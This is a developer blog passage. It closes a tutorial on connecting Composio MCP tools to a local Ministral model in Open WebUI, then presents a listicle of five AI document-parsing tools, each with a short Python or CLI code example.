Step 5: Add Remote MCP Tools for Function Calling

But that's not fun. 😪 We want to use tools that are hosted remotely, right?

For that, we can use Composio MCP, which is well-maintained and supports over 500 apps, so why not?

Now we need the MCP URL... For that, head over to Composio API Reference.

Add your API key and the user ID, and make a request. You should get the MCP URL returned to you in a JSON format. Keep a note of the URL.

💡 But is this the only way? No, this is just a quick way I use to get the URL back without any coding. You can get it using Python/TS code as well.

Now, you're almost there. All you need to do is add a new MCP server with this URL.

Click on your profile icon at the top, under Admin Panel, click on the Settings tab, and under External Tools, click on the "+" button to add external servers.

In the dialog box, make sure that you switch to MCP Streamable HTTP from OpenAPI, and fill in the URL and give it a nice name and description.

For Authentication, check None; we will handle authentication with the additional header "x-api-key". In the Headers input, add the following JSON:

{
  "x-api-key": "YOUR_COMPOSIO_API_KEY"
}

Once that's done, click on Verify Connection, and if everything went well, you should see "Connection Successful." That's pretty much all you need to do to use local and remote tools with the Ministral 3 3B model using Ollama.

The steps here are going to be pretty much the same for any other models that support tool calling.

Here's an example of the model returning a response after doing tool calls:

💡 NOTE: The model might take quite some time to answer the question and perform tool calls, and that pretty much depends on your system as well.

If you feel something is not working as expected, you can always view logs of your Ollama WebUI.

docker logs -f open-webui

Next Steps

This entire demo was done using Ollama and Ollama WebUI. See if you can get it working with vLLM and Ollama WebUI. The steps are going to be quite similar.

Just follow the docs for vLLM installation based on your system, and follow the guide which should get you going.

Let me know if you are able to make it work.

Conclusion

That's it. We just ran a lightweight, quantized Ministral 3 3B model in Ollama, wrapped it with Open WebUI, and showed it can perform real tool calling, both with small local Python tools and remote MCP tools via Composio.

You now have a simple local setup where the model can do more than just chat. The best part is, the steps won't change for other models, and you can quickly have your own local model that's entirely yours.

Now, try adding more toolkits and models (if your system can handle it) and just experiment. You already have a clear understanding of Ministral 3 3B and running models locally with Ollama. Apply it to your actual work, and you'll thank me later.

Well, that's all for now! I will see you in the next one. 🫡

✌️5 AI Document Parsing Tools That Actually Work 🚀🔥

Shrijal Acharya — Fri, 12 Dec 2025 12:35:04 +0000

Working with real world documents is still pain. PDFs, invoices, random exports from legacy tools. Half the work is just getting them into a clean, structured format your models can use. 😕

This post is about that first step. The one that usually gets ignored in demos and tutorials. Parsing and structuring the documents.

The tools here handle OCR, layout, tables, forms and file format so you can focus on the logic around them.

I am walking through a few I actually like using, with short code snippets you can drop straight into your own projects.

So, let's begin. 🚀

1. Tensorlake

💡 Document Ingestion API plus a serverless runtime for agentic data workflows

Tensorlake gives you two big things in one place:

A Document Ingestion API that turns messy files into clean markdown or structured JSON
A serverless platform to run agentic workflows on top of that data

You can send PDFs, Office files, images or raw text and get back well structured content with preserved layout. Long story short, you can treat it as a Document Ingestion API that handles PDFs, Office files, scans and images, then add agent style applications on top using their serverless runtime.

So, instead of handling OCR and background jobs with retry logic, you get one single platform that parses, chunks, classifies and then feeds the results into the agent or tools.

🤔 Is it for you?

If you are building invoice extractors, contract analyzers, or any complex data ingestion or agents that need to actually read documents, Tensorlake sits right in the middle of your stack as the ingestion and workflow layer.

Features

Multi format parsing: Parse PDFs, Office docs, spreadsheets, presentations, images and raw text to markdown or JSON.
Layout aware output: Preserves tables, sections and reading order so your RAG or search stays aligned with the original document, which many other tools miss.

Schema based extraction: Use JSON Schema or Pydantic models to pull out only the fields you care about.
Agentic runtime: Decorate Python functions, run them in sandboxes and let Tensorlake handle scaling, retries and state.

And many more...

Now, let's go through a quick code example of some common use cases.

Code Example: From PDF to markdown

First, install the SDK and use the DocumentAI client to upload a PDF, start a parse job and stream the markdown chunks once parsing is done.

pip install tensorlake

Now, to extract the text from a PDF, you can do something like:

from tensorlake.documentai import DocumentAI, ParseStatus

doc_ai = DocumentAI(api_key="your-api-key")

# Upload and parse document
file_id = doc_ai.upload("/path/to/document.pdf")

# Start parsing
parse_id = doc_ai.parse(file_id)

# Wait until parsing is complete
result = doc_ai.wait_for_completion(parse_id)

if result.status == ParseStatus.SUCCESSFUL:
    # Each chunk is a piece of clean markdown
    for chunk in result.chunks:
        print(chunk.content)

This is the basic flow you would use in a backend job that takes uploaded PDFs and turns them into LLM friendly text for something like RAG or search.

Once you have the chunks, you can push them straight into a vector store or a database.

You can have more control over parsing, like using structured parsing, which you can find here: Structured Extraction. I leave it up to you to explore more about this.

Code Example: Tiny agentic app on the Tensorlake runtime

To run a small agentic app on top of Tensorlake, it's as simple as:

import os
from agents import Agent, Runner
from agents.tool import WebSearchTool, function_tool
from tensorlake.applications import application, function, run_local_application, Image

# Container image with the dependencies the function needs
FUNCTION_CONTAINER_IMAGE = Image(
    base_image="python:3.11-slim",
    name="city_guide_image",
).run("pip install openai openai-agents")

@function_tool
@function(
    description="Gets the weather for a city",
    secrets=["OPENAI_API_KEY"],
    image=FUNCTION_CONTAINER_IMAGE,
)
def get_weather_tool(city: str) -> str:
    agent = Agent(
        name="Weather Reporter",
        instructions="Use web search to find current weather in the city",
        tools=[WebSearchTool()],
    )
    result = Runner.run_sync(agent, f"City: {city}")
    return result.final_output.strip()

@application(tags={"type": "example", "use_case": "city_guide"})
@function(
    description="Creates a simple city guide",
    secrets=["OPENAI_API_KEY"],
    image=FUNCTION_CONTAINER_IMAGE,
)
def city_guide_app(city: str) -> str:
    agent = Agent(
        name="Guide Creator",
        instructions="Make a friendly city guide that includes the current temperature",
        tools=[get_weather_tool],
    )
    result = Runner.run_sync(agent, f"City: {city}")
    return result.final_output.strip()

if __name__ == "__main__":
    city = "Paris"

    if not os.environ.get("OPENAI_API_KEY"):
        print("Error: OPENAI_API_KEY is not set")
        raise SystemExit(1)

    request = run_local_application("city_guide_app", city)
    response = request.output()
    print(response)

This above code creates a city guide application using OpenAI Agents with tool calls. I'm not going to explain the code here, as the blog will get unnecessarily longer.

You can find the explanation for this code in their GitHub README.

Deploying and running on Tensorlake Cloud

To run the application on Tensorlake Cloud, it first needs to be deployed.

Set TENSORLAKE_API_KEY in your shell session:

export TENSORLAKE_API_KEY="Paste your API key here"

Set OPENAI_API_KEY in your Tensorlake Secrets so that your application can make calls to OpenAI:

tensorlake secrets set OPENAI_API_KEY "Paste your API key here"

Deploy the application to Tensorlake Cloud:

tensorlake deploy examples/readme_example/city_guide.py

Run the remote test script found in examples/readme_example/test_remote_app.py:

from tensorlake.applications import run_remote_application

city = "San Francisco"

# Run the application remotely
request = run_remote_application("city_guide_app", city)
print(f"Request ID: {request.id}")

# Get the output
response = request.output()
print(response)

The application will execute on Tensorlake Cloud, with each function running in its own isolated sandbox.

To put it short, Tensorlake takes care of spinning up containers, injecting secrets and keeping the function durable so it can retry tool calls without you building your own queue system.

Here's a quick Tensorlake document ingestion demo to see it in action working with a complex document. 👇

2. Docling

Docling is from the IBM Research Team, licensed under MIT (free and open to commercial use), and turns PDFs, Office docs, images, audio and more into a unified DoclingDocument format. You can then export that into markdown, HTML, DocTags or lossless JSON and plug it straight into RAG, agents or search.

It runs locally and comes with strong layout and table understanding plus OCR and vision models for scanned or complex documents.

Features

Multi format parsing - PDF, DOCX, PPTX, XLSX, HTML, images, audio and more into one structured representation.
Advanced PDF understanding - Page layout, reading order, tables, code, formulas and images handled out of the box.
Multiple export targets - Export a single DoclingDocument to markdown, HTML, DocTags or structured JSON.
Local and privacy friendly - Designed to run completely locally.
Gen AI integrations - Hooks into LangChain, LlamaIndex, Haystack and others out of the box.

And many more...

Code Example - Convert and print markdown

The basic flow is intentionally simple: create a converter, give it a source and then decide how you want to export the result.

from docling.document_converter import DocumentConverter

source = "https://arxiv.org/pdf/2408.09869"  # can also be a local Path(...)
converter = DocumentConverter()
result = converter.convert(source)

markdown = result.document.export_to_markdown()
print(markdown)

This example shows the “one document in, one markdown document out” path that you would usually add into your indexing step.

This gives you one markdown document you can split into chunks and feed into a vector database.

Code Example: Same idea from the CLI

Docling also comes with a CLI. You can install it with the following command:

pip install docling

Now, you can run it using the following command:

# Convert a PDF at a URL to markdown on stdout
docling https://arxiv.org/pdf/2206.01062

# Use the GraniteDocling vision language model in the pipeline
docling --pipeline vlm --vlm-model granite_docling https://arxiv.org/pdf/2206.01062

Obviously, there are a few more complex use cases with a lot more flags you can add. For this, visit their documentation.

Here's a quick video by Red Hat to see it in action. 👇

3. Unstructured

Unstructured gives you an open source library plus a managed platform to turn unstructured content into structured data for LLM apps. It partitions PDFs, slides, HTML, Office files and images into a standard set of elements that downstream tools can easily consume.

On top of that, the ingest layer adds connectors, chunking and embeddings so you can build full ETL style pipelines around your document sources.

Features

One partition API autodetects file type and routes to the right parser for you.
LLM friendly outputs structured elements with text, metadata and coordinates when needed.
Source and destination connectors GitHub, S3 and more via the Ingest CLI and Python library.
Hosted Partition Endpoint offloads compute to their API when you want better models or scale.

Code Example: Quickstart with `partition`

This is the core pattern you will see in most examples, and it is enough to plug into a RAG pipeline.

from unstructured.partition.auto import partition

# Read and partition a document
elements = partition("example-docs/layout-parser-paper.pdf")

# Inspect a few elements
for el in elements[:5]:
    print(repr(el.category), "->", str(el)[:80], "...")

You end up with a list of elements that know their category, which makes it easy to filter for titles, paragraphs or tables before you use it further.

Code Example: Batch processing with Ingest CLI

For real projects you usually need to process many files at once and save the outputs somewhere. It comes with an ingest CLI and is built for exactly that.

# Chunk and partition an entire folder of files
unstructured-ingest \
  local \
    --input-path $LOCAL_FILE_INPUT_DIR \
    --output-dir $LOCAL_FILE_OUTPUT_DIR \
    --chunking-strategy by_title \
    --chunk-max-characters 1024 \
    --partition-by-api \
    --api-key $UNSTRUCTURED_API_KEY \
    --partition-endpoint $UNSTRUCTURED_API_URL \
    --strategy hi_res

This runs a full pipeline that reads documents from LOCAL_FILE_INPUT_DIR, partitions them with the hi_res strategy, chunks them by title and writes the structured outputs into your output directory. From there, you can index or analyze them however you like.

Here's a quick API quickstart to get an idea. 👇

4. Amazon Textract

Amazon Textract is AWS’s managed OCR and document analysis service that pulls text, handwriting, layout and structured data out of scanned documents and PDFs.

It runs inside your AWS account, plugs into services like S3, Lambda, SNS and SQS, and is used at scale by companies like PayTM for document workflows.

Features

Structured extraction pulls data from tables, forms and key value pairs, not just plain text.
Layout and handwriting support detects paragraphs, titles, layout elements and handwritten text in scans.
Works naturally with S3, Lambda, SNS, SQS and other AWS services.
Sync and async APIs low latency calls for single pages plus batch jobs for large multipage docs.
Security and compliance encryption, IAM and regional controls for regulated workloads.

Code Example: Detect text from a local file

This is the basic pattern if you just want the text out of a document. You read the file as bytes, call detect_document_text and print the lines Textract finds.

import boto3

textract = boto3.client("textract")  # uses your AWS credentials

file_path = "sample-doc.png"  # can be any image format

with open(file_path, "rb") as f:
    image_bytes = f.read()

response = textract.detect_document_text(
    Document={"Bytes": image_bytes}
)

for block in response["Blocks"]:
    if block["BlockType"] == "LINE":
        print(block["Text"])

What is happening here:

Textract analyzes the image or PDF and returns a list of Blocks that represent words, lines and other elements.
You filter for blocks of type LINE and print their Text, which is enough for many basic OCR use cases or as a first step before sending text into an LLM.

Code Example: Extract tables and forms from S3

To pull structured data from forms and tables, you use analyze_document with the FORMS and TABLES feature types and point Textract at a document in S3.

import boto3

textract = boto3.client("textract")

bucket_name = "my-doc-bucket"
object_key = "invoices/invoice-001.png"

response = textract.analyze_document(
    Document={
        "S3Object": {
            "Bucket": bucket_name,
            "Name": object_key,
        }
    },
    FeatureTypes=["FORMS", "TABLES"],
)

print(f"Found {len(response['Blocks'])} blocks")

# Quick peek at found tables
for block in response["Blocks"]:
    if block["BlockType"] == "TABLE":
        print("Detected a table with Id:", block["Id"])

There is a lot of other complex stuff that you can do with Textract. For more details, check out the Textract documentation.

In production you usually wire this up with S3 triggers and Lambda so new documents are picked up and processed by themselves.

Here's a quick intro to Amazon Textract. 👇

5. Google Cloud Document AI

Document AI is Google Cloud’s document stack that gives you ready made processors for invoices, receipts, forms, IDs and general OCR. You pick a processor, send it a file and get back a Document object with text, structure, entities and layout info, not just raw strings.

The nice part is how it fits into the rest of GCP (Google Cloud Platform). You can drop files into Cloud Storage, trigger processing with Pub/Sub or Cloud Functions or Cloud Run, then push clean data into BigQuery or your app.

Use it when you want:

Prebuilt processors - invoice, receipt, form, ID and general OCR processors that work out of the box.
Tables and forms - key value pairs and tables straight from scanned PDFs and images.
Custom models - custom extractors, classifiers and splitters when your docs do not match the prebuilt ones.
Cloud pipelines - runs close to Cloud Storage, Cloud Run and Vertex AI so it is easy to wire into existing GCP setups.

Code Example: Send a PDF and read the text

This is the usual Python flow. You create a processor in the console, grab its ID, then call it from your code.

from google.cloud import documentai

project_id = "your-project-id"
location = "us"
processor_id = "your-processor-id"
file_path = "path/to/document.pdf"

client = documentai.DocumentProcessorServiceClient()

name = client.processor_path(project_id, location, processor_id)

with open(file_path, "rb") as f:
    file_bytes = f.read()

raw_document = documentai.RawDocument(
    content=file_bytes,
    mime_type="application/pdf",
)

request = documentai.ProcessRequest(
    name=name,
    raw_document=raw_document,
)

result = client.process_document(request=request)
doc = result.document

print(doc.text[:1000])

You send raw bytes plus the MIME type, Document AI runs the selected processor and you get back a Document object. For quick use cases, grabbing doc.text is enough.

Code Example: Turn a parsed form into fields

If you use a form style processor, Document AI already marks fields as key value pairs, which you can loop over and map into your own schema.

def clean(text: str) -> str:
    return text.replace("\n", " ").strip()

form_doc = doc  # from the previous example. see above

fields = []

for page in form_doc.pages:
    for field in page.form_fields:
        name = clean(field.field_name.text_anchor.content)
        value = clean(field.field_value.text_anchor.content)
        conf = field.field_value.confidence
        fields.append((name, value, conf))

for name, value, conf in fields:
    print(f"{name}: {value} (conf {conf:.2f})")

This is the point where a scanned form basically becomes a Python dict. From here, you can push the data into BigQuery, Firestore or any service you use on GCP.

This is just a start, and there's a lot more to it. Visit the documentation to learn more.

Here's a quick introduction to Google Cloud Document AI. 👇

Conclusion

If you think of any other handy AI tools that I haven't covered in this article, do share them in the comments section below. ✌️

So, that is it for this article. Thank you so much for reading! 🎉🫡